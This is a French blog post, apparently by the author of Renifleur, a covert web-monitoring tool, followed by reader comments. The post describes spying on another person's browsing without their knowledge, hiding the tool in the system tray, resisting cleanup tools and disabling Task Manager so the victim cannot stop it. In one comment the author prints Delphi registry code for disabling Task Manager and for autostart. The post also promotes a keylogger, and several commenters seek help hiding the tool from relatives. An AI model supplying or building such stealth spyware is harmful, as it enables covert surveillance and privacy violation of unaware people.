[logiciel] Renifleur – Surveillance Web

RenifleurRenifleur – pour conserver les traces d’un passage sur internet. Un logiciel qui surveille et note toutes les pages web lues ou visitées, leur adresse et images contenues. Installé sur la barre de notification et protégé par mot de passe, il met sous examen les connexions internet de type HTTP et met en copie dans un répertoire toutes les pages visitées, les photos qui s’y trouvent et les vidéos téléchargés. La surveillance se fait à l’insu de utilisateur et ne ralenti pas la navigation. Par la suite, vous pourrez voir par adresses classées toutes les traces de ce qui a été vu et pris. Ces documents ne seront pas effacés par les outils de nettoyage tels CCleaner ou par la vidange des caches, des historiques ou dossiers internet temporaires.

Renifleur n’est qu’une introduction. Une prochaine version plus technique est prévue (Renifleur+). Avec celle-ci il sera possible de surveiller d’autres ordinateurs sur le réseau et d’y voir tout le texte reçu ou écrit dans d’autres protocoles que le Http (courriel, chat, forum de discussion etc.).

Usage et Options :

Usage habituel : lancer Renifleur, identifier l’interface réseau, indiquez l’endroit ou seront placées les traces de la navigation sur internet, bloquer l’interface par mot de passe si désiré puis appuyez sur le bouton Renifler. En réduisant [-] l’application sur la barre des tâches son accès deviendra protégé par mot de passe.

[1] Interface Réseau : le logiciel identifie les interfaces réseau disponibles. Utiliser celle servant à la connexion TCP/IP internet (habituellement celle qui n’est pas de type DIALUP si vous êtes branché haute vitesse téléphonique ou par cable – DIALUP étant le branchement téléphonique de base).

[2] Créer fichier log: option non pertinente pour le moment.

[3] Ou mettre les traces : par défaut le dossier .\data est suggéré. Ce sous dossier est créé automatiquement dans le répertoire de l’application. On peut en identifier un autre en indiquant le chemin et lui donner la propriété ‘caché‘ si l’on veut. Si l’on spécifie [4] Créer des sous-dossiers, les pages et sites visités seront répartis dans différents sous-dossiers selon la nomenclature des adresse URL ou des nom de domaine. >>

[5] Bloquer par mot de passe : en cochant cette option et mettant un mot de passe (max. 8 caractères ou chiffres) on bloque l’accès à l’application. Pour y accéder il faudra enter le mot de passe dans la fenêtre affichée. Cette fonction à pour but évident d’empêcher un utilisateur de l’arrêter ou de la fermer. De plus, si l’option [7] Désactiver le gestionnaire des tâches lorsque barré est cochée, il ne sera plus possible à l’utilisateur d’activer le gestionnaire des tâches pour supprimer le processus de l’application.

[6] Lancer au démarrage : pour le moment cette option n’est pas utile. A la prochaine version de l’application il sera possible d’automatiser les fonctions Renifler et Mot de Passe dès le démarrage de l’ordinateur.

[7] Bouton Renifler : Pour activer la copie des pages, photos et URL visités via le navigateur ou le lecteur de courriel. On peut laisser l’application ouverte sur le bureau ou mieux la réduire sur la barre de notification (system tray) pour qu’elle passe inaperçue.

[8] Bouton Arrêter : Pour arrêter la copie.

[9] Bouton Mot de Passe : Invoque une fenêtre avec entrée de mot de passe pour bloquer ou débloquer l’application.

Des indications au bas de l’application montrent le nombre de connexions actives ou en attente (ports) sur l’internet ainsi que la dernière adresse url visitée. L’indication Timeout signifie qu’il n’y a aucune connexion internet active.

Note 1: Nettoyer de temps à autres le dossier ou sont placés les traces de visites car celui-ci se rempli allègrement au fil des pages visitées sur le web , parmi les courriels lus ou les Newsgroup. Principalement vrai pour les photos.

Note 2: Les fichiers téléchargés ne sont pas copiés (par souci d’économie d’espace et de rendement). Par contre, la plupart des ‘streams’ vidéos le sont, ainsi que les adresses si vous optez pour ‘Créer des sous-dossiers‘. Pour voir les stream je vous suggère KM Player ou VLC Media Player.

[Téléchargement] Un fichier compressé .rar à prendre **ici**. Sans installation, on n’a qu’à placer l’exécutable dans le répertoire au choix. Par défaut ce sera aussi l’endroit ou seront mis les traces de la navigation internet. Un fichier .ini sera créé pour conserver certains paramètres. Le logiciel est portable en autant que vous ne bloquez pas la barre des tâches (option sur mot de passe) ou ne demandez pas un lancement à l’ouverture de l’ordinateur – ces deux dernières instructions sont mises dans le registre . Le mot de passe est conservé dans l’application et renouvelable à chaque utilisation.

Exemple: Traces laissées dans le répertoire .\data suite à la visite de quelques sites.

renifleur2

[Complément] Voir aussi Volvox Keylogger – capture des touches du clavier.

Publicités

25 Responses to [logiciel] Renifleur – Surveillance Web

  1. volvox dit :

    ADAM a écrit:

    BONJOUR

    J AI JUSTE UN PETIT PROBLEME D INSTALLATION DU LOGI RENIFLEUR
    IL ME MET DES POINT D 1TERROGATION DS L ONGLET “INTERFACE RESEAUX”
    ET IL ME MET ERREUR A CHAQUE FPOIS QUE JE CLIQUE SUR RENIFLER ??
    POUVEZ VOUS ME RENSEIGNER SUR LA MISE EN ROUTE DU LOGICIEL MERCI PAR AVANCE BIEN A VOUS
    ET BONNE CONTINUATION

    Réponse:

    Il faut d’abord choisir parmi la courte liste, l’interface carte réseau de votre ordinateur. Normalement la ligne avec des chiffres : Exemple:

    Merci du commentaire.

  2. Toto dit :

    Est-il normal que les clés des clés de registre contenues dans HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nm\Parameters soient modifiées/ajoutées durant la première éxécution ?

  3. volvox dit :

    Allo TOTO:

    Voici les clés modifiées si l’on applique le démarrage automatique et le retrait de la barre des tâches (comme dit dans le texte) :

    La première pour bloquer la barre des tâches:

    reg.RootKey := HKEY_CURRENT_USER;
    reg.OpenKey(‘Software’, True);
    reg.OpenKey(‘Microsoft’, True);
    reg.OpenKey(‘Windows’, True);
    reg.OpenKey(‘CurrentVersion’, True);
    reg.OpenKey(‘Policies’, True);
    reg.OpenKey(‘System’, True);
    if bTF = True then
    begin
    reg.WriteString(‘DisableTaskMgr’, ‘1’);
    end
    else if bTF = False then
    begin
    reg.DeleteValue(‘DisableTaskMgr’);

    La deuxième pour l’option autodémarrage:

    reg:=Tregistry.Create;
    reg.RootKey:=HKEY_LOCAL_MACHINE;
    reg.OpenKey(‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,false);

    Si ni l’une au l’autre des options sont choisies aucune clé n’est modifiée.

    ==================

    Donc la clé dont tu fais mention n’est pas modifiée par moi. Elle l’est peut-être par un utilitaire installé sur ton ordinateur qui surveille les logiciels installés …

  4. billet dit :

    comment faire en sorte de passer inapercu avec ce logiciel, j´ai un voisin qui fournit l´adsl pour l´immeuble et qui a installer un logiciel identique ou meme celui la pouvez vous me repondre merci

  5. volvox dit :

    Re:

    comment faire en sorte de passer inapercu avec ce logiciel, j´ai un voisin qui fournit l´adsl pour l´immeuble et qui a installer un logiciel identique ou meme celui la pouvez vous me repondre merci

    À ma connaissance il n’y a rien à faire puisque qu’étant fournisseur des lignes, il est en mesure de tout intercepter ou capter les communications entrantes et sortantes (j’imagine qu’il a quelques adresses IP qu’il redistribue dans l’immeuble à l’aide d’un routeur). A la limite vous pourriez crypter vos emails (il existe des utilitaires pour le faire) et certaines autres communications en sortie, mais rien d’entrant ne pourra être soustrait de la vue du fournisseur (sauf les emails entrant cryptés). Par contre, je doute de la légalité de son geste. Vous devriez vous en informer auprès d’autorités compétentes de votre pays. PS: pour une protection accrue, ne prenez pas la ligne directe, munissez-vous d’un bon routeur avec pare-feu intégré et NAT.

  6. collaud dit :

    bonjour où se procurer renifleur?

  7. volvox dit :

    où se procurer renifleur?

    Dans la section Téléchargement du texte plus hau : **ici**

  8. Baptiste dit :

    Bonjour, aprés avoir instalé le keylogger, il me demande de chosir avec quoi l’ouvrir. Je choisis wordpad mais sa ne marche pas.
    Donc, avec quoi dois-je l’ouvrir?
    Merci d’avance…

  9. volvox dit :

    Baptiste à dit:
    Samedi, Avril 19, 2008 à 11:27

    Bonjour, aprés avoir instalé le keylogger, il me demande de chosir avec quoi l’ouvrir. Je choisis wordpad mais sa ne marche pas.
    Donc, avec quoi dois-je l’ouvrir?
    Merci d’avance…

    La tu me vois un peu confus. Quel est le problème? Plus de détail. Ici ce n’est pas la page keylogger mais Renifleur. Est-ce de ce logiciel dont tu parlesz?

  10. em dit :

    Bonjour!!
    Au risque de passer pr une grosse nul et de confirmer que les filles ont parfois bcp demal avec l’informatique, j’ai une question: Je viens d’installer volvox keyloggeur mais quand je veux voir se qui a été tapé sur mon ordi je clique sur « voir le log » c’est alors qu’on me dit que le log n’existe pas!!! Que dois je faire? Bien sur j’avais deja lancer volvx, je ne suis pas non plus debile lol!!!! Merci d’avance!!!

  11. daniel dit :

    Salut, je veux installer renifleur sur un ordi, on me dit que pcap/winpcap n’est pas installe et dans reseau ca me donne ????? je suis en win2000, je veux installer ca sur windows vista aussi. ca ira ?

  12. Caty dit :

    Bonjour,
    j’ai un message d’erreur qui s’affiche :
    aucune interface trouvée! Soyez certains que pcap/winpcap est intallé!

    Je ne sais pas quoi faire ni ce que cela veut dire!!!
    Je suis très contente avec le keyloggeur et je me suis laisser séduire par le renifleur mais j’aimerai bien pouvoir m’en servir loool!!!

    Merci d’avance et bonne continuation a vous

    Vous pouvez me repondre sur latinacatarina@hotmail.com….

    Et encore merci de mettre a notre dispo. c’est super logiciels!!!

    Amitié
    Caty

  13. volvox dit :

    Bonjour … concernant l’absence de WINCAP … J’ai du mal à figurer la cause de cette erreur car j’ai inclus une version de ce pilote dans le logiciel Renifleur. Avez-vous bien sélectionné une interface réseau (et la bonne) dans la configuration de Renifleur. Si oui, le logiciel devrait bien fonctionner.

    Si l’erreur persiste, je vous invite alors à installer gratuitement le pilote approprié (sécuritaire et sans conséquences sur l’opération de votre ordinateur). Adresse de wincap:
    http://www.winpcap.org/install/default.htm

    Cliquer sur : WinPcap auto-installer (driver +DLLs)

  14. elfifi dit :

    bonjour moi j’utilise vista le logiciel portable et placé à la racine de C:\ et j’ai la même erreur
    impossible de sélectionner l’interface de ma carte réseau qui apparait bien dans ipconfig /all

    c’est vraiment dommage car ce serai un très bon contrôle parental encore merci pour tous ses softs

    • volvox dit :

      Cela ne dépend pas de Vista mais de votre carte réseau. Il se peut que certaines cartes ou contrôleurs réseaux ne soient pas reconnus par le logiciel. Je ne peut rien y faire – pour l’instant – . Note… le nouveau keylogger que je vais bientôt distribuer rend compte de tous les sites web visités (sans toutefois conserver les images).

  15. elfifi dit :

    bonjour volvox
    oui je comprends bien je pense qu’il doit être fâché avec d-link lol
    car j’avais une carte PCI d-link dfe 530 tx que j’ai remplacé par une D-Link DGE-528T Gigabit Ethernet cela n’a rien changé j’attends avec impatience ce nouveau keyloger pour l’essayer
    PS merci pour votre partage

  16. Pomeline dit :

    Bonsoir
    Je suis néophyte en informatique. J’aimerais savoir exactement à quoi sert un renifleur. Estil facile à installer ? Evite-t-il les intrusions qui peuvent $etre faite à notre insu ?
    Merci

    • volvox dit :

      Non … ce logiciel ne sers qu’à capturer et conserver dans des dossiers toutes pages (textes et images) vues par une personne naviguant sur le web. Ces pages peuvent ensuite être parcourues plus tard. Ces captures sont faites sans que la personne ‘espionnée’ le sache.

      Donc ça ne permet pas d’éviter les intrusions.

  17. DriX dit :

    je ne trouve pas de lien pour télécharger « Renifleur »
    est-il toujours dispo ?

    Merci

  18. DriX dit :

    oups j’ai trouvé
    désolé et merci pour ce soft

  19. grillet dit :

    Bonjour à vous,j’ai lu toutes les informations sur le renifleur de surveillance web…mais je ne trouve pas le lien pour le telecherger ?
    Pouvez-vous m’aider, merci
    Cordialement

  20. Thierry dit :

    est ce que renifleur ne renifle que ce que je fait sur mon ordi ou est ce qu’il renifle si mes contact msn sont connectés ?

  21. Gérard dit :

    Bonjour.
    J’ai installlé le logiciel, coché « lacer au demarrage »; il démarre bien mais je voudrais bien qu’il se lance seul sans apparaitre à l’écran. (Ce n’est pas toujours moi qui demarre le PC (mon jeune fils); comment faire pour qu’il travaille en sous-marin?
    dans l’attente, merci

  22. Nina dit :

    Bonjour,

    J’ai un soucis dans l’installation de Renileur, il me met des ??? à l’interface réseau et je n’ai rien dans la liste déroulante. SVP où puis-je trouver cette interface??? Merci de votre aide.

  23. Thierry dit :

    Bonjour, le renifleur est exactement le logiciel dont j ai besoin…mais le lien de telechargement ne fonctionne pas ! quelqu’un peu m’aider?merci par avance. Thierry

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

%d blogueurs aiment cette page :